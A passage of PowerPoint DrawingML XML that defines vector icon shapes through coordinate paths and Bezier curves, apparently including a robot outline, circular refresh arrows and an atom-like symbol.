                    <a:pt x="3067842" y="1281925"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3207033" y="1281925"/>
                    <a:pt x="3319870" y="1394762"/>
                    <a:pt x="3319870" y="1533953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3319870" y="2505897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3319870" y="2645088"/>
                    <a:pt x="3207033" y="2757925"/>
                    <a:pt x="3067842" y="2757925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2928651" y="2757925"/>
                    <a:pt x="2815814" y="2645088"/>
                    <a:pt x="2815814" y="2505897"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2815814" y="1533953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2815814" y="1394762"/>
                    <a:pt x="2928651" y="1281925"/>
                    <a:pt x="3067842" y="1281925"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="252028" y="1281925"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="391219" y="1281925"/>
                    <a:pt x="504056" y="1394762"/>
                    <a:pt x="504056" y="1533953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="504056" y="2505897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="504056" y="2645088"/>
                    <a:pt x="391219" y="2757925"/>
                    <a:pt x="252028" y="2757925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112837" y="2757925"/>
                    <a:pt x="0" y="2645088"/>
                    <a:pt x="0" y="2505897"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1533953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1394762"/>
                    <a:pt x="112837" y="1281925"/>
                    <a:pt x="252028" y="1281925"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134062" y="558521"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2073373" y="558521"/>
                    <a:pt x="2024174" y="607720"/>
                    <a:pt x="2024174" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2024174" y="729098"/>
                    <a:pt x="2073373" y="778297"/>
                    <a:pt x="2134062" y="778297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2194751" y="778297"/>
                    <a:pt x="2243950" y="729098"/>
                    <a:pt x="2243950" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2243950" y="607720"/>
                    <a:pt x="2194751" y="558521"/>
                    <a:pt x="2134062" y="558521"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1177409" y="558521"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1116720" y="558521"/>
                    <a:pt x="1067521" y="607720"/>
                    <a:pt x="1067521" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1067521" y="729098"/>
                    <a:pt x="1116720" y="778297"/>
                    <a:pt x="1177409" y="778297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1238098" y="778297"/>
                    <a:pt x="1287297" y="729098"/>
                    <a:pt x="1287297" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1287297" y="607720"/>
                    <a:pt x="1238098" y="558521"/>
                    <a:pt x="1177409" y="558521"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1041854" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1215617" y="300965"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1350827" y="238508"/>
                    <a:pt x="1501239" y="204386"/>
                    <a:pt x="1659158" y="204272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1823689" y="204153"/>
                    <a:pt x="1980124" y="240963"/>
                    <a:pt x="2119837" y="308065"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2297698" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2391229" y="54000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215205" y="358882"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2507692" y="533629"/>
                    <a:pt x="2710924" y="843756"/>
                    <a:pt x="2737127" y="1206450"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018962" y="1206967"/>
                    <a:pt x="1300797" y="1207483"/>
                    <a:pt x="582632" y="1208000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="608780" y="838665"/>
                    <a:pt x="818541" y="523565"/>
                    <a:pt x="1119462" y="350420"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="948323" y="540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C0C7969F-A090-4D7D-AE69-318914512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5011" y="2518278"/>
              <a:ext cx="340001" cy="338281"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2956013" h="2941055"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B9186B4-3CAE-4B1B-9EE5-82556E22D24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45251" y="2251006"/>
              <a:ext cx="441966" cy="281210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AE4B125-6999-45DF-B3C8-56A855BA5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273" y="3365017"/>
              <a:ext cx="357359" cy="364685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3860876" h="3940019">
                  <a:moveTo>
                    <a:pt x="3248876" y="1942264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3860876" y="1942264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3860876" y="2090815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859023" y="2090815"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3817225" y="2949620"/>
                    <a:pt x="3215273" y="3679864"/>
                    <a:pt x="2378197" y="3884304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2219818" y="3922985"/>
                    <a:pt x="2060231" y="3941082"/>
                    <a:pt x="1902626" y="3939971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1286982" y="3935631"/>
                    <a:pt x="701577" y="3638194"/>
                    <a:pt x="337583" y="3128887"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30667" y="3435803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30667" y="2342045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124425" y="2342045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781340" y="2685130"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1079782" y="3180935"/>
                    <a:pt x="1667379" y="3425841"/>
                    <a:pt x="2232517" y="3287817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2810639" y="3146622"/>
                    <a:pt x="3224897" y="2638979"/>
                    <a:pt x="3247291" y="2044286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3248876" y="2044345"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1958249" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2573893" y="4388"/>
                    <a:pt x="3159298" y="301825"/>
                    <a:pt x="3523293" y="811132"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3830209" y="504216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3830209" y="1597974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736450" y="1597974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079535" y="1254889"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2781093" y="759084"/>
                    <a:pt x="2193496" y="514178"/>
                    <a:pt x="1628358" y="652202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1050236" y="793397"/>
                    <a:pt x="635978" y="1301040"/>
                    <a:pt x="613584" y="1895733"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="612000" y="1895674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612000" y="1985958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1985958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1837407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2787" y="1837407"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="49183" y="983705"/>
                    <a:pt x="649445" y="259216"/>
                    <a:pt x="1482678" y="55715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1641057" y="17034"/>
                    <a:pt x="1800644" y="-1063"/>
                    <a:pt x="195824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16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F6F3B5-823E-442B-809C-F7DFF41F2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8038" y="5418963"/>
              <a:ext cx="353455" cy="397548"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1376433 w 2765122"/>
                <a:gd name="connsiteY0" fmla="*/ 2257187 h 3110058"/>
                <a:gd name="connsiteX1" fmla="*/ 1145400 w 2765122"/>
                <a:gd name="connsiteY1" fmla="*/ 2354829 h 3110058"/>
                <a:gd name="connsiteX2" fmla="*/ 1036105 w 2765122"/>
                <a:gd name="connsiteY2" fmla="*/ 2389775 h 3110058"/>
                <a:gd name="connsiteX3" fmla="*/ 1040146 w 2765122"/>
                <a:gd name="connsiteY3" fmla="*/ 2406930 h 3110058"/>
                <a:gd name="connsiteX4" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY4" fmla="*/ 2894301 h 3110058"/>
                <a:gd name="connsiteX5" fmla="*/ 1724974 w 2765122"/>
                <a:gd name="connsiteY5" fmla="*/ 2406930 h 3110058"/>
                <a:gd name="connsiteX6" fmla="*/ 1726723 w 2765122"/>
                <a:gd name="connsiteY6" fmla="*/ 2399874 h 3110058"/>
                <a:gd name="connsiteX7" fmla="*/ 1605728 w 2765122"/>
                <a:gd name="connsiteY7" fmla="*/ 2358846 h 3110058"/>
                <a:gd name="connsiteX8" fmla="*/ 1795887 w 2765122"/>
                <a:gd name="connsiteY8" fmla="*/ 2033026 h 3110058"/>
                <a:gd name="connsiteX9" fmla="*/ 1694075 w 2765122"/>
                <a:gd name="connsiteY9" fmla="*/ 2094586 h 3110058"/>
                <a:gd name="connsiteX10" fmla="*/ 1578650 w 2765122"/>
                <a:gd name="connsiteY10" fmla="*/ 2155153 h 3110058"/>
                <a:gd name="connsiteX11" fmla="*/ 1618821 w 2765122"/>
                <a:gd name="connsiteY11" fmla="*/ 2173994 h 3110058"/>
                <a:gd name="connsiteX12" fmla="*/ 1763952 w 2765122"/>
                <a:gd name="connsiteY12" fmla="*/ 2229138 h 3110058"/>
                <a:gd name="connsiteX13" fmla="*/ 1791432 w 2765122"/>
                <a:gd name="connsiteY13" fmla="*/ 2076334 h 3110058"/>
                <a:gd name="connsiteX14" fmla="*/ 969005 w 2765122"/>
                <a:gd name="connsiteY14" fmla="*/ 2030800 h 3110058"/>
                <a:gd name="connsiteX15" fmla="*/ 973688 w 2765122"/>
                <a:gd name="connsiteY15" fmla="*/ 2076334 h 3110058"/>
                <a:gd name="connsiteX16" fmla="*/ 997942 w 2765122"/>
                <a:gd name="connsiteY16" fmla="*/ 2219324 h 3110058"/>
                <a:gd name="connsiteX17" fmla="*/ 1135534 w 2765122"/>
                <a:gd name="connsiteY17" fmla="*/ 2169774 h 3110058"/>
                <a:gd name="connsiteX18" fmla="*/ 1176026 w 2765122"/>
                <a:gd name="connsiteY18" fmla="*/ 2151638 h 3110058"/>
                <a:gd name="connsiteX19" fmla="*/ 1061678 w 2765122"/>
                <a:gd name="connsiteY19" fmla="*/ 2089068 h 3110058"/>
                <a:gd name="connsiteX20" fmla="*/ 2270995 w 2765122"/>
                <a:gd name="connsiteY20" fmla="*/ 1682607 h 3110058"/>
                <a:gd name="connsiteX21" fmla="*/ 2193789 w 2765122"/>
                <a:gd name="connsiteY21" fmla="*/ 1749541 h 3110058"/>
                <a:gd name="connsiteX22" fmla="*/ 2080535 w 2765122"/>
                <a:gd name="connsiteY22" fmla="*/ 1839120 h 3110058"/>
                <a:gd name="connsiteX23" fmla="*/ 1988274 w 2765122"/>
                <a:gd name="connsiteY23" fmla="*/ 1905861 h 3110058"/>
                <a:gd name="connsiteX24" fmla="*/ 1956628 w 2765122"/>
                <a:gd name="connsiteY24" fmla="*/ 2160317 h 3110058"/>
                <a:gd name="connsiteX25" fmla="*/ 1929983 w 2765122"/>
                <a:gd name="connsiteY25" fmla="*/ 2282840 h 3110058"/>
                <a:gd name="connsiteX26" fmla="*/ 2032699 w 2765122"/>
                <a:gd name="connsiteY26" fmla="*/ 2311732 h 3110058"/>
                <a:gd name="connsiteX27" fmla="*/ 2530541 w 2765122"/>
                <a:gd name="connsiteY27" fmla="*/ 2244806 h 3110058"/>
                <a:gd name="connsiteX28" fmla="*/ 2289139 w 2765122"/>
                <a:gd name="connsiteY28" fmla="*/ 1700285 h 3110058"/>
                <a:gd name="connsiteX29" fmla="*/ 491768 w 2765122"/>
                <a:gd name="connsiteY29" fmla="*/ 1666932 h 3110058"/>
                <a:gd name="connsiteX30" fmla="*/ 473585 w 2765122"/>
                <a:gd name="connsiteY30" fmla="*/ 1684439 h 3110058"/>
                <a:gd name="connsiteX31" fmla="*/ 222717 w 2765122"/>
                <a:gd name="connsiteY31" fmla="*/ 2224664 h 3110058"/>
                <a:gd name="connsiteX32" fmla="*/ 719315 w 2765122"/>
                <a:gd name="connsiteY32" fmla="*/ 2300269 h 3110058"/>
                <a:gd name="connsiteX33" fmla="*/ 831176 w 2765122"/>
                <a:gd name="connsiteY33" fmla="*/ 2270901 h 3110058"/>
                <a:gd name="connsiteX34" fmla="*/ 808495 w 2765122"/>
                <a:gd name="connsiteY34" fmla="*/ 2160317 h 3110058"/>
                <a:gd name="connsiteX35" fmla="*/ 776012 w 2765122"/>
                <a:gd name="connsiteY35" fmla="*/ 1899134 h 3110058"/>
                <a:gd name="connsiteX36" fmla="*/ 679735 w 2765122"/>
                <a:gd name="connsiteY36" fmla="*/ 1826895 h 3110058"/>
                <a:gd name="connsiteX37" fmla="*/ 502637 w 2765122"/>
                <a:gd name="connsiteY37" fmla="*/ 1677612 h 3110058"/>
                <a:gd name="connsiteX38" fmla="*/ 2001099 w 2765122"/>
                <a:gd name="connsiteY38" fmla="*/ 1443878 h 3110058"/>
                <a:gd name="connsiteX39" fmla="*/ 2005588 w 2765122"/>
                <a:gd name="connsiteY39" fmla="*/ 1555029 h 3110058"/>
                <a:gd name="connsiteX40" fmla="*/ 2000712 w 2765122"/>
                <a:gd name="connsiteY40" fmla="*/ 1675767 h 3110058"/>
                <a:gd name="connsiteX41" fmla="*/ 2038461 w 2765122"/>
                <a:gd name="connsiteY41" fmla="*/ 1648469 h 3110058"/>
                <a:gd name="connsiteX42" fmla="*/ 2130505 w 2765122"/>
                <a:gd name="connsiteY42" fmla="*/ 1573751 h 3110058"/>
                <a:gd name="connsiteX43" fmla="*/ 2143759 w 2765122"/>
                <a:gd name="connsiteY43" fmla="*/ 1562074 h 3110058"/>
                <a:gd name="connsiteX44" fmla="*/ 2039991 w 2765122"/>
                <a:gd name="connsiteY44" fmla="*/ 1473050 h 3110058"/>
                <a:gd name="connsiteX45" fmla="*/ 764411 w 2765122"/>
                <a:gd name="connsiteY45" fmla="*/ 1434288 h 3110058"/>
                <a:gd name="connsiteX46" fmla="*/ 726661 w 2765122"/>
                <a:gd name="connsiteY46" fmla="*/ 1461587 h 3110058"/>
                <a:gd name="connsiteX47" fmla="*/ 634617 w 2765122"/>
                <a:gd name="connsiteY47" fmla="*/ 1536305 h 3110058"/>
                <a:gd name="connsiteX48" fmla="*/ 621360 w 2765122"/>
                <a:gd name="connsiteY48" fmla="*/ 1547985 h 3110058"/>
                <a:gd name="connsiteX49" fmla="*/ 725129 w 2765122"/>
                <a:gd name="connsiteY49" fmla="*/ 1637009 h 3110058"/>
                <a:gd name="connsiteX50" fmla="*/ 764024 w 2765122"/>
                <a:gd name="connsiteY50" fmla="*/ 1666183 h 3110058"/>
                <a:gd name="connsiteX51" fmla="*/ 759534 w 2765122"/>
                <a:gd name="connsiteY51" fmla="*/ 1555029 h 3110058"/>
                <a:gd name="connsiteX52" fmla="*/ 1386966 w 2765122"/>
                <a:gd name="connsiteY52" fmla="*/ 1049980 h 3110058"/>
                <a:gd name="connsiteX53" fmla="*/ 1160689 w 2765122"/>
                <a:gd name="connsiteY53" fmla="*/ 1170734 h 3110058"/>
                <a:gd name="connsiteX54" fmla="*/ 947211 w 2765122"/>
                <a:gd name="connsiteY54" fmla="*/ 1303680 h 3110058"/>
                <a:gd name="connsiteX55" fmla="*/ 938816 w 2765122"/>
                <a:gd name="connsiteY55" fmla="*/ 1555028 h 3110058"/>
                <a:gd name="connsiteX56" fmla="*/ 947046 w 2765122"/>
                <a:gd name="connsiteY56" fmla="*/ 1801432 h 3110058"/>
                <a:gd name="connsiteX57" fmla="*/ 1154015 w 2765122"/>
                <a:gd name="connsiteY57" fmla="*/ 1935392 h 3110058"/>
                <a:gd name="connsiteX58" fmla="*/ 1378151 w 2765122"/>
                <a:gd name="connsiteY58" fmla="*/ 2060078 h 3110058"/>
                <a:gd name="connsiteX59" fmla="*/ 1604433 w 2765122"/>
                <a:gd name="connsiteY59" fmla="*/ 1939321 h 3110058"/>
                <a:gd name="connsiteX60" fmla="*/ 1817909 w 2765122"/>
                <a:gd name="connsiteY60" fmla="*/ 1806377 h 3110058"/>
                <a:gd name="connsiteX61" fmla="*/ 1826304 w 2765122"/>
                <a:gd name="connsiteY61" fmla="*/ 1555028 h 3110058"/>
                <a:gd name="connsiteX62" fmla="*/ 1818074 w 2765122"/>
                <a:gd name="connsiteY62" fmla="*/ 1308628 h 3110058"/>
                <a:gd name="connsiteX63" fmla="*/ 1611105 w 2765122"/>
                <a:gd name="connsiteY63" fmla="*/ 1174667 h 3110058"/>
                <a:gd name="connsiteX64" fmla="*/ 1767179 w 2765122"/>
                <a:gd name="connsiteY64" fmla="*/ 890733 h 3110058"/>
                <a:gd name="connsiteX65" fmla="*/ 1629589 w 2765122"/>
                <a:gd name="connsiteY65" fmla="*/ 940281 h 3110058"/>
                <a:gd name="connsiteX66" fmla="*/ 1589093 w 2765122"/>
                <a:gd name="connsiteY66" fmla="*/ 958419 h 3110058"/>
                <a:gd name="connsiteX67" fmla="*/ 1703444 w 2765122"/>
                <a:gd name="connsiteY67" fmla="*/ 1020991 h 3110058"/>
                <a:gd name="connsiteX68" fmla="*/ 1796116 w 2765122"/>
                <a:gd name="connsiteY68" fmla="*/ 1079257 h 3110058"/>
                <a:gd name="connsiteX69" fmla="*/ 1791432 w 2765122"/>
                <a:gd name="connsiteY69" fmla="*/ 1033723 h 3110058"/>
                <a:gd name="connsiteX70" fmla="*/ 1001168 w 2765122"/>
                <a:gd name="connsiteY70" fmla="*/ 880921 h 3110058"/>
                <a:gd name="connsiteX71" fmla="*/ 973688 w 2765122"/>
                <a:gd name="connsiteY71" fmla="*/ 1033723 h 3110058"/>
                <a:gd name="connsiteX72" fmla="*/ 969233 w 2765122"/>
                <a:gd name="connsiteY72" fmla="*/ 1077033 h 3110058"/>
                <a:gd name="connsiteX73" fmla="*/ 1071048 w 2765122"/>
                <a:gd name="connsiteY73" fmla="*/ 1015472 h 3110058"/>
                <a:gd name="connsiteX74" fmla="*/ 1186470 w 2765122"/>
                <a:gd name="connsiteY74" fmla="*/ 954907 h 3110058"/>
                <a:gd name="connsiteX75" fmla="*/ 1146299 w 2765122"/>
                <a:gd name="connsiteY75" fmla="*/ 936065 h 3110058"/>
                <a:gd name="connsiteX76" fmla="*/ 2296662 w 2765122"/>
                <a:gd name="connsiteY76" fmla="*/ 783036 h 3110058"/>
                <a:gd name="connsiteX77" fmla="*/ 2045808 w 2765122"/>
                <a:gd name="connsiteY77" fmla="*/ 809787 h 3110058"/>
                <a:gd name="connsiteX78" fmla="*/ 1933945 w 2765122"/>
                <a:gd name="connsiteY78" fmla="*/ 839155 h 3110058"/>
                <a:gd name="connsiteX79" fmla="*/ 1956628 w 2765122"/>
                <a:gd name="connsiteY79" fmla="*/ 949742 h 3110058"/>
                <a:gd name="connsiteX80" fmla="*/ 1989111 w 2765122"/>
                <a:gd name="connsiteY80" fmla="*/ 1210925 h 3110058"/>
                <a:gd name="connsiteX81" fmla="*/ 2085387 w 2765122"/>
                <a:gd name="connsiteY81" fmla="*/ 1283163 h 3110058"/>
                <a:gd name="connsiteX82" fmla="*/ 2262485 w 2765122"/>
                <a:gd name="connsiteY82" fmla="*/ 1432446 h 3110058"/>
                <a:gd name="connsiteX83" fmla="*/ 2273353 w 2765122"/>
                <a:gd name="connsiteY83" fmla="*/ 1443125 h 3110058"/>
                <a:gd name="connsiteX84" fmla="*/ 2291537 w 2765122"/>
                <a:gd name="connsiteY84" fmla="*/ 1425616 h 3110058"/>
                <a:gd name="connsiteX85" fmla="*/ 2542406 w 2765122"/>
                <a:gd name="connsiteY85" fmla="*/ 885391 h 3110058"/>
                <a:gd name="connsiteX86" fmla="*/ 2296662 w 2765122"/>
                <a:gd name="connsiteY86" fmla="*/ 783036 h 3110058"/>
                <a:gd name="connsiteX87" fmla="*/ 482072 w 2765122"/>
                <a:gd name="connsiteY87" fmla="*/ 767202 h 3110058"/>
                <a:gd name="connsiteX88" fmla="*/ 234579 w 2765122"/>
                <a:gd name="connsiteY88" fmla="*/ 865253 h 3110058"/>
                <a:gd name="connsiteX89" fmla="*/ 475981 w 2765122"/>
                <a:gd name="connsiteY89" fmla="*/ 1409774 h 3110058"/>
                <a:gd name="connsiteX90" fmla="*/ 494126 w 2765122"/>
                <a:gd name="connsiteY90" fmla="*/ 1427453 h 3110058"/>
                <a:gd name="connsiteX91" fmla="*/ 571333 w 2765122"/>
                <a:gd name="connsiteY91" fmla="*/ 1360517 h 3110058"/>
                <a:gd name="connsiteX92" fmla="*/ 684587 w 2765122"/>
                <a:gd name="connsiteY92" fmla="*/ 1270938 h 3110058"/>
                <a:gd name="connsiteX93" fmla="*/ 776848 w 2765122"/>
                <a:gd name="connsiteY93" fmla="*/ 1204197 h 3110058"/>
                <a:gd name="connsiteX94" fmla="*/ 808495 w 2765122"/>
                <a:gd name="connsiteY94" fmla="*/ 949742 h 3110058"/>
                <a:gd name="connsiteX95" fmla="*/ 835139 w 2765122"/>
                <a:gd name="connsiteY95" fmla="*/ 827220 h 3110058"/>
                <a:gd name="connsiteX96" fmla="*/ 732420 w 2765122"/>
                <a:gd name="connsiteY96" fmla="*/ 798327 h 3110058"/>
                <a:gd name="connsiteX97" fmla="*/ 482072 w 2765122"/>
                <a:gd name="connsiteY97" fmla="*/ 767202 h 3110058"/>
                <a:gd name="connsiteX98" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY98" fmla="*/ 215755 h 3110058"/>
                <a:gd name="connsiteX99" fmla="*/ 1040146 w 2765122"/>
                <a:gd name="connsiteY99" fmla="*/ 703126 h 3110058"/>
                <a:gd name="connsiteX100" fmla="*/ 1038397 w 2765122"/>
                <a:gd name="connsiteY100" fmla="*/ 710184 h 3110058"/>
                <a:gd name="connsiteX101" fmla="*/ 1159394 w 2765122"/>
                <a:gd name="connsiteY101" fmla="*/ 751212 h 3110058"/>
                <a:gd name="connsiteX102" fmla="*/ 1388689 w 2765122"/>
                <a:gd name="connsiteY102" fmla="*/ 852872 h 3110058"/>
                <a:gd name="connsiteX103" fmla="*/ 1619722 w 2765122"/>
                <a:gd name="connsiteY103" fmla="*/ 755229 h 3110058"/>
                <a:gd name="connsiteX104" fmla="*/ 1729016 w 2765122"/>
                <a:gd name="connsiteY104" fmla="*/ 720284 h 3110058"/>
                <a:gd name="connsiteX105" fmla="*/ 1724974 w 2765122"/>
                <a:gd name="connsiteY105" fmla="*/ 703126 h 3110058"/>
                <a:gd name="connsiteX106" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY106" fmla="*/ 215755 h 3110058"/>
                <a:gd name="connsiteX107" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY107" fmla="*/ 0 h 3110058"/>
                <a:gd name="connsiteX108" fmla="*/ 1863319 w 2765122"/>
                <a:gd name="connsiteY108" fmla="*/ 565886 h 3110058"/>
                <a:gd name="connsiteX109" fmla="*/ 1892754 w 2765122"/>
                <a:gd name="connsiteY109" fmla="*/ 669221 h 3110058"/>
                <a:gd name="connsiteX110" fmla="*/ 1998805 w 2765122"/>
                <a:gd name="connsiteY110" fmla="*/ 644109 h 3110058"/>
                <a:gd name="connsiteX111" fmla="*/ 2729256 w 2765122"/>
                <a:gd name="connsiteY111" fmla="*/ 777515 h 3110058"/>
                <a:gd name="connsiteX112" fmla="*/ 2479563 w 2765122"/>
                <a:gd name="connsiteY112" fmla="*/ 1476806 h 3110058"/>
                <a:gd name="connsiteX113" fmla="*/ 2396868 w 2765122"/>
                <a:gd name="connsiteY113" fmla="*/ 1564493 h 3110058"/>
                <a:gd name="connsiteX114" fmla="*/ 2415853 w 2765122"/>
                <a:gd name="connsiteY114" fmla="*/ 1583149 h 3110058"/>
                <a:gd name="connsiteX115" fmla="*/ 2715481 w 2765122"/>
                <a:gd name="connsiteY115" fmla="*/ 2355928 h 3110058"/>
                <a:gd name="connsiteX116" fmla="*/ 1982813 w 2765122"/>
                <a:gd name="connsiteY116" fmla="*/ 2476565 h 3110058"/>
                <a:gd name="connsiteX117" fmla="*/ 1890625 w 2765122"/>
                <a:gd name="connsiteY117" fmla="*/ 2453030 h 3110058"/>
                <a:gd name="connsiteX118" fmla="*/ 1863319 w 2765122"/>
                <a:gd name="connsiteY118" fmla="*/ 2544172 h 3110058"/>
                <a:gd name="connsiteX119" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY119" fmla="*/ 3110058 h 3110058"/>
                <a:gd name="connsiteX120" fmla="*/ 901803 w 2765122"/>
                <a:gd name="connsiteY120" fmla="*/ 2544172 h 3110058"/>
                <a:gd name="connsiteX121" fmla="*/ 872368 w 2765122"/>
                <a:gd name="connsiteY121" fmla="*/ 2440837 h 3110058"/>
                <a:gd name="connsiteX122" fmla="*/ 766317 w 2765122"/>
                <a:gd name="connsiteY122" fmla="*/ 2465949 h 3110058"/>
                <a:gd name="connsiteX123" fmla="*/ 35866 w 2765122"/>
                <a:gd name="connsiteY123" fmla="*/ 2332544 h 3110058"/>
                <a:gd name="connsiteX124" fmla="*/ 285559 w 2765122"/>
                <a:gd name="connsiteY124" fmla="*/ 1633252 h 3110058"/>
                <a:gd name="connsiteX125" fmla="*/ 368254 w 2765122"/>
                <a:gd name="connsiteY125" fmla="*/ 1545565 h 3110058"/>
                <a:gd name="connsiteX126" fmla="*/ 349269 w 2765122"/>
                <a:gd name="connsiteY126" fmla="*/ 1526910 h 3110058"/>
                <a:gd name="connsiteX127" fmla="*/ 49641 w 2765122"/>
                <a:gd name="connsiteY127" fmla="*/ 754130 h 3110058"/>
                <a:gd name="connsiteX128" fmla="*/ 782309 w 2765122"/>
                <a:gd name="connsiteY128" fmla="*/ 633493 h 3110058"/>
                <a:gd name="connsiteX129" fmla="*/ 874497 w 2765122"/>
                <a:gd name="connsiteY129" fmla="*/ 657029 h 3110058"/>
                <a:gd name="connsiteX130" fmla="*/ 901803 w 2765122"/>
                <a:gd name="connsiteY130" fmla="*/ 565886 h 3110058"/>
                <a:gd name="connsiteX131" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY131" fmla="*/ 0 h 31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765122" h="3110058">
                  <a:moveTo>
                    <a:pt x="1376433" y="2257187"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1145400" y="2354829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036105" y="2389775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1040146" y="2406930"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1121535" y="2704580"/>
                    <a:pt x="1244707" y="2894301"/>
                    <a:pt x="1382560" y="2894301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1520414" y="2894301"/>
                    <a:pt x="1643585" y="2704580"/>
                    <a:pt x="1724974" y="2406930"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1726723" y="2399874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1605728" y="2358846"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1795887" y="2033026"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1694075" y="2094586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1578650" y="2155153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618821" y="2173994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1763952" y="2229138"/>
                  </a:lnTo>
                  <a:lnTo>
